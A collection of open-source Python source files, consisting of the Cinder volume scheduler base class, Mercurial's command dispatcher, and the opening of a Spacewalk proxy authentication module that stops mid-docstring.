# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Scheduler base class that all Schedulers should inherit from
"""
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import timeutils
from cinder import db
from cinder.i18n import _
from cinder.volume import rpcapi as volume_rpcapi
scheduler_driver_opts = [
cfg.StrOpt('scheduler_host_manager',
default='cinder.scheduler.host_manager.HostManager',
help='The scheduler host manager class to use'),
cfg.IntOpt('scheduler_max_attempts',
default=3,
help='Maximum number of attempts to schedule an volume'),
]
CONF = cfg.CONF
CONF.register_opts(scheduler_driver_opts)
def volume_update_db(context, volume_id, host):
"""Set the host and set the scheduled_at field of a volume.
:returns: A Volume with the updated fields set properly.
"""
values = {'host': host, 'scheduled_at': timeutils.utcnow()}
return db.volume_update(context, volume_id, values)
def group_update_db(context, group, host):
"""Set the host and the scheduled_at field of a consistencygroup.
:returns: A Consistencygroup with the updated fields set properly.
"""
group.update({'host': host, 'updated_at': timeutils.utcnow()})
group.save()
return group
class Scheduler(object):
"""The base class that all Scheduler classes should inherit from."""
def __init__(self):
self.host_manager = importutils.import_object(
CONF.scheduler_host_manager)
self.volume_rpcapi = volume_rpcapi.VolumeAPI()
def is_ready(self):
"""Returns True if Scheduler is ready to accept requests.
This is to handle scheduler service startup when it has no volume hosts
stats and will fail all the requests.
"""
return self.host_manager.has_all_capabilities()
def update_service_capabilities(self, service_name, host, capabilities):
"""Process a capability update from a service node."""
self.host_manager.update_service_capabilities(service_name,
host,
capabilities)
def host_passes_filters(self, context, volume_id, host, filter_properties):
"""Check if the specified host passes the filters."""
raise NotImplementedError(_("Must implement host_passes_filters"))
def find_retype_host(self, context, request_spec, filter_properties=None,
migration_policy='never'):
"""Find a host that can accept the volume with its new type."""
raise NotImplementedError(_("Must implement find_retype_host"))
def schedule(self, context, topic, method, *_args, **_kwargs):
"""Must override schedule method for scheduler to work."""
raise NotImplementedError(_("Must implement a fallback schedule"))
def schedule_create_volume(self, context, request_spec, filter_properties):
"""Must override schedule method for scheduler to work."""
raise NotImplementedError(_("Must implement schedule_create_volume"))
def schedule_create_consistencygroup(self, context, group,
request_spec_list,
filter_properties_list):
"""Must override schedule method for scheduler to work."""
raise NotImplementedError(_(
"Must implement schedule_create_consistencygroup"))
def get_pools(self, context, filters):
"""Must override schedule method for scheduler to work."""
raise NotImplementedError(_(
"Must implement schedule_get_pools"))
| nikesh-mahalka/cinder | cinder/scheduler/driver.py | Python | apache-2.0 | 4,426 |
# dispatch.py - command dispatching for mercurial
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from i18n import _
import os, sys, atexit, signal, pdb, socket, errno, shlex, time, traceback, re
import util, commands, hg, fancyopts, extensions, hook, error
import cmdutil, encoding
import ui as uimod
class request(object):
def __init__(self, args, ui=None, repo=None, fin=None, fout=None,
ferr=None):
self.args = args
self.ui = ui
self.repo = repo
# input/output/error streams
self.fin = fin
self.fout = fout
self.ferr = ferr
def run():
"run the command in sys.argv"
sys.exit((dispatch(request(sys.argv[1:])) or 0) & 255)
def dispatch(req):
"run the command specified in req.args"
if req.ferr:
ferr = req.ferr
elif req.ui:
ferr = req.ui.ferr
else:
ferr = sys.stderr
try:
if not req.ui:
req.ui = uimod.ui()
if '--traceback' in req.args:
req.ui.setconfig('ui', 'traceback', 'on')
# set ui streams from the request
if req.fin:
req.ui.fin = req.fin
if req.fout:
req.ui.fout = req.fout
if req.ferr:
req.ui.ferr = req.ferr
except util.Abort, inst:
ferr.write(_("abort: %s\n") % inst)
if inst.hint:
ferr.write(_("(%s)\n") % inst.hint)
return -1
except error.ParseError, inst:
if len(inst.args) > 1:
ferr.write(_("hg: parse error at %s: %s\n") %
(inst.args[1], inst.args[0]))
else:
ferr.write(_("hg: parse error: %s\n") % inst.args[0])
return -1
msg = ' '.join(' ' in a and repr(a) or a for a in req.args)
starttime = time.time()
ret = None
try:
ret = _runcatch(req)
return ret
finally:
duration = time.time() - starttime
req.ui.log("commandfinish", "%s exited %s after %0.2f seconds\n",
msg, ret or 0, duration)
def _runcatch(req):
def catchterm(*args):
raise error.SignalInterrupt
ui = req.ui
try:
for name in 'SIGBREAK', 'SIGHUP', 'SIGTERM':
num = getattr(signal, name, None)
if num:
signal.signal(num, catchterm)
except ValueError:
pass # happens if called in a thread
try:
try:
debugger = 'pdb'
debugtrace = {
'pdb' : pdb.set_trace
}
debugmortem = {
'pdb' : pdb.post_mortem
}
# read --config before doing anything else
# (e.g. to change trust settings for reading .hg/hgrc)
cfgs = _parseconfig(req.ui, _earlygetopt(['--config'], req.args))
if req.repo:
# copy configs that were passed on the cmdline (--config) to
# the repo ui
for cfg in cfgs:
req.repo.ui.setconfig(*cfg)
debugger = ui.config("ui", "debugger")
if not debugger:
debugger = 'pdb'
try:
debugmod = __import__(debugger)
except ImportError:
debugmod = pdb
debugtrace[debugger] = debugmod.set_trace
debugmortem[debugger] = debugmod.post_mortem
# enter the debugger before command execution
if '--debugger' in req.args:
ui.warn(_("entering debugger - "
"type c to continue starting hg or h for help\n"))
if (debugger != 'pdb' and
debugtrace[debugger] == debugtrace['pdb']):
ui.warn(_("%s debugger specified "
"but its module was not found\n") % debugger)
debugtrace[debugger]()
try:
return _dispatch(req)
finally:
ui.flush()
except: # re-raises
# enter the debugger when we hit an exception
if '--debugger' in req.args:
traceback.print_exc()
debugmortem[debugger](sys.exc_info()[2])
ui.traceback()
raise
# Global exception handling, alphabetically
# Mercurial-specific first, followed by built-in and library exceptions
except error.AmbiguousCommand, inst:
ui.warn(_("hg: command '%s' is ambiguous:\n %s\n") %
(inst.args[0], " ".join(inst.args[1])))
except error.ParseError, inst:
if len(inst.args) > 1:
ui.warn(_("hg: parse error at %s: %s\n") %
(inst.args[1], inst.args[0]))
else:
ui.warn(_("hg: parse error: %s\n") % inst.args[0])
return -1
except error.LockHeld, inst:
if inst.errno == errno.ETIMEDOUT:
reason = _('timed out waiting for lock held by %s') % inst.locker
else:
reason = _('lock held by %s') % inst.locker
ui.warn(_("abort: %s: %s\n") % (inst.desc or inst.filename, reason))
except error.LockUnavailable, inst:
ui.warn(_("abort: could not lock %s: %s\n") %
(inst.desc or inst.filename, inst.strerror))
except error.CommandError, inst:
if inst.args[0]:
ui.warn(_("hg %s: %s\n") % (inst.args[0], inst.args[1]))
commands.help_(ui, inst.args[0], full=False, command=True)
else:
ui.warn(_("hg: %s\n") % inst.args[1])
commands.help_(ui, 'shortlist')
except error.OutOfBandError, inst:
ui.warn(_("abort: remote error:\n"))
ui.warn(''.join(inst.args))
except error.RepoError, inst:
ui.warn(_("abort: %s!\n") % inst)
if inst.hint:
ui.warn(_("(%s)\n") % inst.hint)
except error.ResponseError, inst:
ui.warn(_("abort: %s") % inst.args[0])
if not isinstance(inst.args[1], basestring):
ui.warn(" %r\n" % (inst.args[1],))
elif not inst.args[1]:
ui.warn(_(" empty string\n"))
else:
ui.warn("\n%r\n" % util.ellipsis(inst.args[1]))
except error.RevlogError, inst:
ui.warn(_("abort: %s!\n") % inst)
except error.SignalInterrupt:
ui.warn(_("killed!\n"))
except error.UnknownCommand, inst:
ui.warn(_("hg: unknown command '%s'\n") % inst.args[0])
try:
# check if the command is in a disabled extension
# (but don't check for extensions themselves)
commands.help_(ui, inst.args[0], unknowncmd=True)
except error.UnknownCommand:
commands.help_(ui, 'shortlist')
except error.InterventionRequired, inst:
ui.warn("%s\n" % inst)
return 1
except util.Abort, inst:
ui.warn(_("abort: %s\n") % inst)
if inst.hint:
ui.warn(_("(%s)\n") % inst.hint)
except ImportError, inst:
ui.warn(_("abort: %s!\n") % inst)
m = str(inst).split()[-1]
if m in "mpatch bdiff".split():
ui.warn(_("(did you forget to compile extensions?)\n"))
elif m in "zlib".split():
ui.warn(_("(is your Python install correct?)\n"))
except IOError, inst:
if util.safehasattr(inst, "code"):
ui.warn(_("abort: %s\n") % inst)
elif util.safehasattr(inst, "reason"):
try: # usually it is in the form (errno, strerror)
reason = inst.reason.args[1]
except (AttributeError, IndexError):
# it might be anything, for example a string
reason = inst.reason
ui.warn(_("abort: error: %s\n") % reason)
elif util.safehasattr(inst, "args") and inst.args[0] == errno.EPIPE:
if ui.debugflag:
ui.warn(_("broken pipe\n"))
elif getattr(inst, "strerror", None):
if getattr(inst, "filename", None):
ui.warn(_("abort: %s: %s\n") % (inst.strerror, inst.filename))
else:
ui.warn(_("abort: %s\n") % inst.strerror)
else:
raise
except OSError, inst:
if getattr(inst, "filename", None) is not None:
ui.warn(_("abort: %s: '%s'\n") % (inst.strerror, inst.filename))
else:
ui.warn(_("abort: %s\n") % inst.strerror)
except KeyboardInterrupt:
try:
ui.warn(_("interrupted!\n"))
except IOError, inst:
if inst.errno == errno.EPIPE:
if ui.debugflag:
ui.warn(_("\nbroken pipe\n"))
else:
raise
except MemoryError:
ui.warn(_("abort: out of memory\n"))
except SystemExit, inst:
# Commands shouldn't sys.exit directly, but give a return code.
# Just in case catch this and and pass exit code to caller.
return inst.code
except socket.error, inst:
ui.warn(_("abort: %s\n") % inst.args[-1])
except: # re-raises
myver = util.version()
# For compatibility checking, we discard the portion of the hg
# version after the + on the assumption that if a "normal
# user" is running a build with a + in it the packager
# probably built from fairly close to a tag and anyone with a
# 'make local' copy of hg (where the version number can be out
# of date) will be clueful enough to notice the implausible
# version number and try updating.
compare = myver.split('+')[0]
ct = tuplever(compare)
worst = None, ct, ''
for name, mod in extensions.extensions():
testedwith = getattr(mod, 'testedwith', '')
report = getattr(mod, 'buglink', _('the extension author.'))
if not testedwith.strip():
# We found an untested extension. It's likely the culprit.
worst = name, 'unknown', report
break
if compare not in testedwith.split() and testedwith != 'internal':
tested = [tuplever(v) for v in testedwith.split()]
lower = [t for t in tested if t < ct]
nearest = max(lower or tested)
if worst[0] is None or nearest < worst[1]:
worst = name, nearest, report
if worst[0] is not None:
name, testedwith, report = worst
if not isinstance(testedwith, str):
testedwith = '.'.join([str(c) for c in testedwith])
warning = (_('** Unknown exception encountered with '
'possibly-broken third-party extension %s\n'
'** which supports versions %s of Mercurial.\n'
'** Please disable %s and try your action again.\n'
'** If that fixes the bug please report it to %s\n')
% (name, testedwith, name, report))
else:
warning = (_("** unknown exception encountered, "
"please report by visiting\n") +
_("** http://mercurial.selenic.com/wiki/BugTracker\n"))
warning += ((_("** Python %s\n") % sys.version.replace('\n', '')) +
(_("** Mercurial Distributed SCM (version %s)\n") % myver) +
(_("** Extensions loaded: %s\n") %
", ".join([x[0] for x in extensions.extensions()])))
ui.log("commandexception", "%s\n%s\n", warning, traceback.format_exc())
ui.warn(warning)
raise
return -1
def tuplever(v):
try:
return tuple([int(i) for i in v.split('.')])
except ValueError:
return tuple()
def aliasargs(fn, givenargs):
args = getattr(fn, 'args', [])
if args:
cmd = ' '.join(map(util.shellquote, args))
nums = []
def replacer(m):
num = int(m.group(1)) - 1
nums.append(num)
if num < len(givenargs):
return givenargs[num]
raise util.Abort(_('too few arguments for command alias'))
cmd = re.sub(r'\$(\d+|\$)', replacer, cmd)
givenargs = [x for i, x in enumerate(givenargs)
if i not in nums]
args = shlex.split(cmd)
return args + givenargs
class cmdalias(object):
def __init__(self, name, definition, cmdtable):
self.name = self.cmd = name
self.cmdname = ''
self.definition = definition
self.args = []
self.opts = []
self.help = ''
self.norepo = True
self.optionalrepo = False
self.badalias = False
try:
aliases, entry = cmdutil.findcmd(self.name, cmdtable)
for alias, e in cmdtable.iteritems():
if e is entry:
self.cmd = alias
break
self.shadows = True
except error.UnknownCommand:
self.shadows = False
if not self.definition:
def fn(ui, *args):
ui.warn(_("no definition for alias '%s'\n") % self.name)
return 1
self.fn = fn
self.badalias = True
return
if self.definition.startswith('!'):
self.shell = True
def fn(ui, *args):
env = {'HG_ARGS': ' '.join((self.name,) + args)}
def _checkvar(m):
if m.groups()[0] == '$':
return m.group()
elif int(m.groups()[0]) <= len(args):
return m.group()
else:
ui.debug("No argument found for substitution "
"of %i variable in alias '%s' definition."
% (int(m.groups()[0]), self.name))
return ''
cmd = re.sub(r'\$(\d+|\$)', _checkvar, self.definition[1:])
replace = dict((str(i + 1), arg) for i, arg in enumerate(args))
replace['0'] = self.name
replace['@'] = ' '.join(args)
cmd = util.interpolate(r'\$', replace, cmd, escape_prefix=True)
return util.system(cmd, environ=env, out=ui.fout)
self.fn = fn
return
args = shlex.split(self.definition)
self.cmdname = cmd = args.pop(0)
args = map(util.expandpath, args)
for invalidarg in ("--cwd", "-R", "--repository", "--repo", "--config"):
if _earlygetopt([invalidarg], args):
def fn(ui, *args):
ui.warn(_("error in definition for alias '%s': %s may only "
"be given on the command line\n")
% (self.name, invalidarg))
return 1
self.fn = fn
self.badalias = True
return
try:
tableentry = cmdutil.findcmd(cmd, cmdtable, False)[1]
if len(tableentry) > 2:
self.fn, self.opts, self.help = tableentry
else:
self.fn, self.opts = tableentry
self.args = aliasargs(self.fn, args)
if cmd not in commands.norepo.split(' '):
self.norepo = False
if cmd in commands.optionalrepo.split(' '):
self.optionalrepo = True
if self.help.startswith("hg " + cmd):
# drop prefix in old-style help lines so hg shows the alias
self.help = self.help[4 + len(cmd):]
self.__doc__ = self.fn.__doc__
except error.UnknownCommand:
def fn(ui, *args):
ui.warn(_("alias '%s' resolves to unknown command '%s'\n") \
% (self.name, cmd))
try:
# check if the command is in a disabled extension
commands.help_(ui, cmd, unknowncmd=True)
except error.UnknownCommand:
pass
return 1
self.fn = fn
self.badalias = True
except error.AmbiguousCommand:
def fn(ui, *args):
ui.warn(_("alias '%s' resolves to ambiguous command '%s'\n") \
% (self.name, cmd))
return 1
self.fn = fn
self.badalias = True
def __call__(self, ui, *args, **opts):
if self.shadows:
ui.debug("alias '%s' shadows command '%s'\n" %
(self.name, self.cmdname))
if util.safehasattr(self, 'shell'):
return self.fn(ui, *args, **opts)
else:
try:
util.checksignature(self.fn)(ui, *args, **opts)
except error.SignatureError:
args = ' '.join([self.cmdname] + self.args)
ui.debug("alias '%s' expands to '%s'\n" % (self.name, args))
raise
def addaliases(ui, cmdtable):
# aliases are processed after extensions have been loaded, so they
# may use extension commands. Aliases can also use other alias definitions,
# but only if they have been defined prior to the current definition.
for alias, definition in ui.configitems('alias'):
aliasdef = cmdalias(alias, definition, cmdtable)
try:
olddef = cmdtable[aliasdef.cmd][0]
if olddef.definition == aliasdef.definition:
continue
except (KeyError, AttributeError):
# definition might not exist or it might not be a cmdalias
pass
cmdtable[aliasdef.name] = (aliasdef, aliasdef.opts, aliasdef.help)
if aliasdef.norepo:
commands.norepo += ' %s' % alias
if aliasdef.optionalrepo:
commands.optionalrepo += ' %s' % alias
def _parse(ui, args):
options = {}
cmdoptions = {}
try:
args = fancyopts.fancyopts(args, commands.globalopts, options)
except fancyopts.getopt.GetoptError, inst:
raise error.CommandError(None, inst)
if args:
cmd, args = args[0], args[1:]
aliases, entry = cmdutil.findcmd(cmd, commands.table,
ui.configbool("ui", "strict"))
cmd = aliases[0]
args = aliasargs(entry[0], args)
defaults = ui.config("defaults", cmd)
if defaults:
args = map(util.expandpath, shlex.split(defaults)) + args
c = list(entry[1])
else:
cmd = None
c = []
# combine global options into local
for o in commands.globalopts:
c.append((o[0], o[1], options[o[1]], o[3]))
try:
args = fancyopts.fancyopts(args, c, cmdoptions, True)
except fancyopts.getopt.GetoptError, inst:
raise error.CommandError(cmd, inst)
# separate global options back out
for o in commands.globalopts:
n = o[1]
options[n] = cmdoptions[n]
del cmdoptions[n]
return (cmd, cmd and entry[0] or None, args, options, cmdoptions)
def _parseconfig(ui, config):
"""parse the --config options from the command line"""
configs = []
for cfg in config:
try:
name, value = cfg.split('=', 1)
section, name = name.split('.', 1)
if not section or not name:
raise IndexError
ui.setconfig(section, name, value)
configs.append((section, name, value))
except (IndexError, ValueError):
raise util.Abort(_('malformed --config option: %r '
'(use --config section.name=value)') % cfg)
return configs
def _earlygetopt(aliases, args):
"""Return list of values for an option (or aliases).
The values are listed in the order they appear in args.
The options and values are removed from args.
>>> args = ['x', '--cwd', 'foo', 'y']
>>> _earlygetopt(['--cwd'], args), args
(['foo'], ['x', 'y'])
>>> args = ['x', '--cwd=bar', 'y']
>>> _earlygetopt(['--cwd'], args), args
(['bar'], ['x', 'y'])
>>> args = ['x', '-R', 'foo', 'y']
>>> _earlygetopt(['-R'], args), args
(['foo'], ['x', 'y'])
>>> args = ['x', '-Rbar', 'y']
>>> _earlygetopt(['-R'], args), args
(['bar'], ['x', 'y'])
"""
try:
argcount = args.index("--")
except ValueError:
argcount = len(args)
shortopts = [opt for opt in aliases if len(opt) == 2]
values = []
pos = 0
while pos < argcount:
fullarg = arg = args[pos]
equals = arg.find('=')
if equals > -1:
arg = arg[:equals]
if arg in aliases:
del args[pos]
if equals > -1:
values.append(fullarg[equals + 1:])
argcount -= 1
else:
if pos + 1 >= argcount:
# ignore and let getopt report an error if there is no value
break
values.append(args.pop(pos))
argcount -= 2
elif arg[:2] in shortopts:
# short option can have no following space, e.g. hg log -Rfoo
values.append(args.pop(pos)[2:])
argcount -= 1
else:
pos += 1
return values
def runcommand(lui, repo, cmd, fullargs, ui, options, d, cmdpats, cmdoptions):
# run pre-hook, and abort if it fails
hook.hook(lui, repo, "pre-%s" % cmd, True, args=" ".join(fullargs),
pats=cmdpats, opts=cmdoptions)
ret = _runcommand(ui, options, cmd, d)
# run post-hook, passing command result
hook.hook(lui, repo, "post-%s" % cmd, False, args=" ".join(fullargs),
result=ret, pats=cmdpats, opts=cmdoptions)
return ret
def _getlocal(ui, rpath):
"""Return (path, local ui object) for the given target path.
Takes paths in [cwd]/.hg/hgrc into account."
"""
try:
wd = os.getcwd()
except OSError, e:
raise util.Abort(_("error getting current working directory: %s") %
e.strerror)
path = cmdutil.findrepo(wd) or ""
if not path:
lui = ui
else:
lui = ui.copy()
lui.readconfig(os.path.join(path, ".hg", "hgrc"), path)
if rpath and rpath[-1]:
path = lui.expandpath(rpath[-1])
lui = ui.copy()
lui.readconfig(os.path.join(path, ".hg", "hgrc"), path)
return path, lui
def _checkshellalias(lui, ui, args):
options = {}
try:
args = fancyopts.fancyopts(args, commands.globalopts, options)
except fancyopts.getopt.GetoptError:
return
if not args:
return
norepo = commands.norepo
optionalrepo = commands.optionalrepo
def restorecommands():
commands.norepo = norepo
commands.optionalrepo = optionalrepo
cmdtable = commands.table.copy()
addaliases(lui, cmdtable)
cmd = args[0]
try:
aliases, entry = cmdutil.findcmd(cmd, cmdtable,
lui.configbool("ui", "strict"))
except (error.AmbiguousCommand, error.UnknownCommand):
restorecommands()
return
cmd = aliases[0]
fn = entry[0]
if cmd and util.safehasattr(fn, 'shell'):
d = lambda: fn(ui, *args[1:])
return lambda: runcommand(lui, None, cmd, args[:1], ui, options, d,
[], {})
restorecommands()
_loaded = set()
def _dispatch(req):
args = req.args
ui = req.ui
# check for cwd
cwd = _earlygetopt(['--cwd'], args)
if cwd:
os.chdir(cwd[-1])
rpath = _earlygetopt(["-R", "--repository", "--repo"], args)
path, lui = _getlocal(ui, rpath)
# Now that we're operating in the right directory/repository with
# the right config settings, check for shell aliases
shellaliasfn = _checkshellalias(lui, ui, args)
if shellaliasfn:
return shellaliasfn()
# Configure extensions in phases: uisetup, extsetup, cmdtable, and
# reposetup. Programs like TortoiseHg will call _dispatch several
# times so we keep track of configured extensions in _loaded.
extensions.loadall(lui)
exts = [ext for ext in extensions.extensions() if ext[0] not in _loaded]
# Propagate any changes to lui.__class__ by extensions
ui.__class__ = lui.__class__
# (uisetup and extsetup are handled in extensions.loadall)
for name, module in exts:
cmdtable = getattr(module, 'cmdtable', {})
overrides = [cmd for cmd in cmdtable if cmd in commands.table]
if overrides:
ui.warn(_("extension '%s' overrides commands: %s\n")
% (name, " ".join(overrides)))
commands.table.update(cmdtable)
_loaded.add(name)
# (reposetup is handled in hg.repository)
addaliases(lui, commands.table)
# check for fallback encoding
fallback = lui.config('ui', 'fallbackencoding')
if fallback:
encoding.fallbackencoding = fallback
fullargs = args
cmd, func, args, options, cmdoptions = _parse(lui, args)
if options["config"]:
raise util.Abort(_("option --config may not be abbreviated!"))
if options["cwd"]:
raise util.Abort(_("option --cwd may not be abbreviated!"))
if options["repository"]:
raise util.Abort(_(
"option -R has to be separated from other options (e.g. not -qR) "
"and --repository may only be abbreviated as --repo!"))
if options["encoding"]:
encoding.encoding = options["encoding"]
if options["encodingmode"]:
encoding.encodingmode = options["encodingmode"]
if options["time"]:
def get_times():
t = os.times()
if t[4] == 0.0: # Windows leaves this as zero, so use time.clock()
t = (t[0], t[1], t[2], t[3], time.clock())
return t
s = get_times()
def print_time():
t = get_times()
ui.warn(_("time: real %.3f secs (user %.3f+%.3f sys %.3f+%.3f)\n") %
(t[4]-s[4], t[0]-s[0], t[2]-s[2], t[1]-s[1], t[3]-s[3]))
atexit.register(print_time)
uis = set([ui, lui])
if req.repo:
uis.add(req.repo.ui)
if options['verbose'] or options['debug'] or options['quiet']:
for opt in ('verbose', 'debug', 'quiet'):
val = str(bool(options[opt]))
for ui_ in uis:
ui_.setconfig('ui', opt, val)
if options['traceback']:
for ui_ in uis:
ui_.setconfig('ui', 'traceback', 'on')
if options['noninteractive']:
for ui_ in uis:
ui_.setconfig('ui', 'interactive', 'off')
if cmdoptions.get('insecure', False):
for ui_ in uis:
ui_.setconfig('web', 'cacerts', '')
if options['version']:
return commands.version_(ui)
if options['help']:
return commands.help_(ui, cmd)
elif not cmd:
return commands.help_(ui, 'shortlist')
repo = None
cmdpats = args[:]
if cmd not in commands.norepo.split():
# use the repo from the request only if we don't have -R
if not rpath and not cwd:
repo = req.repo
if repo:
# set the descriptors of the repo ui to those of ui
repo.ui.fin = ui.fin
repo.ui.fout = ui.fout
repo.ui.ferr = ui.ferr
else:
try:
repo = hg.repository(ui, path=path)
if not repo.local():
raise util.Abort(_("repository '%s' is not local") % path)
if options['hidden']:
repo = repo.unfiltered()
repo.ui.setconfig("bundle", "mainreporoot", repo.root)
except error.RequirementError:
raise
except error.RepoError:
if cmd not in commands.optionalrepo.split():
if (cmd in commands.inferrepo.split() and
args and not path): # try to infer -R from command args
repos = map(cmdutil.findrepo, args)
guess = repos[0]
if guess and repos.count(guess) == len(repos):
req.args = ['--repository', guess] + fullargs
return _dispatch(req)
if not path:
raise error.RepoError(_("no repository found in '%s'"
" (.hg not found)")
% os.getcwd())
raise
if repo:
ui = repo.ui
args.insert(0, repo)
elif rpath:
ui.warn(_("warning: --repository ignored\n"))
msg = ' '.join(' ' in a and repr(a) or a for a in fullargs)
ui.log("command", '%s\n', msg)
d = lambda: util.checksignature(func)(ui, *args, **cmdoptions)
try:
return runcommand(lui, repo, cmd, fullargs, ui, options, d,
cmdpats, cmdoptions)
finally:
if repo and repo != req.repo:
repo.close()
def lsprofile(ui, func, fp):
format = ui.config('profiling', 'format', default='text')
field = ui.config('profiling', 'sort', default='inlinetime')
limit = ui.configint('profiling', 'limit', default=30)
climit = ui.configint('profiling', 'nested', default=5)
if format not in ['text', 'kcachegrind']:
ui.warn(_("unrecognized profiling format '%s'"
" - Ignored\n") % format)
format = 'text'
try:
from mercurial import lsprof
except ImportError:
raise util.Abort(_(
'lsprof not available - install from '
'http://codespeak.net/svn/user/arigo/hack/misc/lsprof/'))
p = lsprof.Profiler()
p.enable(subcalls=True)
try:
return func()
finally:
p.disable()
if format == 'kcachegrind':
import lsprofcalltree
calltree = lsprofcalltree.KCacheGrind(p)
calltree.output(fp)
else:
# format == 'text'
stats = lsprof.Stats(p.getstats())
stats.sort(field)
stats.pprint(limit=limit, file=fp, climit=climit)
def statprofile(ui, func, fp):
try:
import statprof
except ImportError:
raise util.Abort(_(
'statprof not available - install using "easy_install statprof"'))
freq = ui.configint('profiling', 'freq', default=1000)
if freq > 0:
statprof.reset(freq)
else:
ui.warn(_("invalid sampling frequency '%s' - ignoring\n") % freq)
statprof.start()
try:
return func()
finally:
statprof.stop()
statprof.display(fp)
def _runcommand(ui, options, cmd, cmdfunc):
def checkargs():
try:
return cmdfunc()
except error.SignatureError:
raise error.CommandError(cmd, _("invalid arguments"))
if options['profile']:
profiler = os.getenv('HGPROF')
if profiler is None:
profiler = ui.config('profiling', 'type', default='ls')
if profiler not in ('ls', 'stat'):
ui.warn(_("unrecognized profiler '%s' - ignored\n") % profiler)
profiler = 'ls'
output = ui.config('profiling', 'output')
if output:
path = ui.expandpath(output)
fp = open(path, 'wb')
else:
fp = sys.stderr
try:
if profiler == 'ls':
return lsprofile(ui, checkargs, fp)
else:
return statprofile(ui, checkargs, fp)
finally:
if output:
fp.close()
else:
return checkargs()
| jordigh/mercurial-crew | mercurial/dispatch.py | Python | gpl-2.0 | 31,772 |
# Spacewalk Proxy Server authentication manager.
#
# Copyright (c) 2008--2015 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
# -----------------------------------------------------------------------------
# system imports
import os
import time
import socket
import xmlrpclib
import sys
# pylint: disable=E0611
from hashlib import sha1
# common imports
from spacewalk.common.rhnLib import parseUrl
from spacewalk.common.rhnTB import Traceback
from spacewalk.common.rhnLog import log_debug, log_error
from spacewalk.common.rhnConfig import CFG
from spacewalk.common.rhnException import rhnFault
from spacewalk.common import rhnCache
from spacewalk.common.rhnTranslate import _
# local imports
from rhn import rpclib
from rhn import SSL
import rhnAuthCacheClient
sys.path.append('/usr/share/rhn')
from up2date_client import config # pylint: disable=E0012, C0413
# To avoid doing unnecessary work, keep ProxyAuth object global
__PROXY_AUTH = None
UP2DATE_CONFIG = config.Config('/etc/sysconfig/rhn/up2date')
def get_proxy_auth(hostname=None):
global __PROXY_AUTH
if not __PROXY_AUTH:
__PROXY_AUTH = ProxyAuth(hostname)
if __PROXY_AUTH.hostname != hostname:
__PROXY_AUTH = ProxyAuth(hostname)
return __PROXY_AUTH
class ProxyAuth:
__serverid = None
__systemid = None
__systemid_mtime = None
__systemid_filename = UP2DATE_CONFIG['systemIdPath']
__nRetries = 3 # number of login retries
hostname = None
def __init__(self, hostname):
log_debug(3)
ProxyAuth.hostname = hostname
self.__processSystemid()
def __processSystemid(self):
""" update the systemid/serverid but only if they stat differently.
returns 0=no updates made; or 1=updates were made
"""
if not os.access(ProxyAuth.__systemid_filename, os.R_OK):
log_error("unable to access %s" % ProxyAuth.__systemid_filename)
raise rhnFault(1000,
_("Spacewalk Proxy error (Spacewalk Proxy systemid has wrong permissions?). "
"Please contact your system administrator."))
mtime = None
try:
mtime = os.stat(ProxyAuth.__systemid_filename)[-2]
except IOError, e:
log_error("unable to stat %s: %s" % (ProxyAuth.__systemid_filename, repr(e)))
raise rhnFault(1000,
_("Spacewalk Proxy error (Spacewalk Proxy systemid has wrong permissions?). "
"Please contact your system administrator.")), None, sys.exc_info()[2]
if not self.__systemid_mtime:
ProxyAuth.__systemid_mtime = mtime
if self.__systemid_mtime == mtime \
and self.__systemid and self.__serverid:
# nothing to do
return 0
# get systemid
try:
ProxyAuth.__systemid = open(ProxyAuth.__systemid_filename, 'r').read()
except IOError, e:
log_error("unable to read %s" % ProxyAuth.__systemid_filename)
raise rhnFault(1000,
_("Spacewalk Proxy error (Spacewalk Proxy systemid has wrong permissions?). "
"Please contact your system administrator.")), None, sys.exc_info()[2]
# get serverid
sysid, _cruft = xmlrpclib.loads(ProxyAuth.__systemid)
ProxyAuth.__serverid = sysid[0]['system_id'][3:]
log_debug(7, 'SystemId: "%s[...snip snip...]%s"'
% (ProxyAuth.__systemid[:20], ProxyAuth.__systemid[-20:]))
log_debug(7, 'ServerId: %s' % ProxyAuth.__serverid)
# ids were updated
return 1
def get_system_id(self):
""" return the system id"""
self.__processSystemid()
return self.__systemid
def check_cached_token(self, forceRefresh=0):
""" check cache, login if need be, and cache.
"""
log_debug(3)
oldToken = self.get_cached_token()
token = oldToken
if not token or forceRefresh or self.__processSystemid():
token = self.login()
if token and token != oldToken:
self.set_cached_token(token)
return token
def get_cached_token(self):
""" Fetches this proxy's token (or None) from the cache
"""
log_debug(3)
# Try to connect to the token-cache.
shelf = get_auth_shelf()
# Fetch the token
key = self.__cache_proxy_key()
if shelf.has_key(key):
return shelf[key]
return None
def set_cached_token(self, token):
""" Caches current token in the auth cache.
"""
log_debug(3)
# Try to connect to the token-cache.
shelf = get_auth_shelf()
# Cache the token.
try:
shelf[self.__cache_proxy_key()] = token
except:
text = _("""\
Caching of authentication token for proxy id %s failed!
Either the authentication caching daemon is experiencing
problems, isn't running, or the token is somehow corrupt.
""") % self.__serverid
Traceback("ProxyAuth.set_cached_token", extra=text)
raise rhnFault(1000,
_("Spacewalk Proxy error (auth caching issue). "
"Please contact your system administrator.")), None, sys.exc_info()[2]
log_debug(4, "successfully returning")
return token
def del_cached_token(self):
"""Removes the token from the cache
"""
log_debug(3)
# Connect to the token cache
shelf = get_auth_shelf()
key = self.__cache_proxy_key()
try:
del shelf[key]
except KeyError:
# no problem
pass
def login(self):
""" Login and fetch new token (proxy token).
How it works in a nutshell.
Only the broker component uses this. We perform a xmlrpc request
to rhn_parent. This occurs outside of the http process we are
currently working on. So, we do this all on our own; do all of
our own SSL decisionmaking etc. We use CFG.RHN_PARENT as we always
bypass the SSL redirect.
DESIGN NOTES: what is the proxy auth token?
-------------------------------------------
